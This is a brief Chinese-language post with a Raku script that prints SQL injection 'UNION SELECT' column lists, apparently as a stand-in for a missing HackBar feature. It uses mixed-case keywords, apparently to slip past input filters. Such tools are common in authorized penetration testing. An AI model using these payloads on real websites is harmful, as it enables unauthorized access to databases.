新版 firefox 中的 hackbar 没有 order by 字段填写, 所以就有了这个:
=begin pod
sql注入中自动输出order by 的位数
=end pod
sub MAIN(Int $number,Str $char?) {
my @sql = [];
if @*ARGS.elems == 2 {
for 1..$number {
if $char ~~ /:i null/ {
@sql.push: $char;
}
else {
@sql.push: "'"~$char~"'" ;
}
}
say 'UnIoN SeLeCT '~@sql.join(',');
exit;
}
my $sql = (1..$number).join(',');
say 'UnIoN sElEcT '~$sql;
}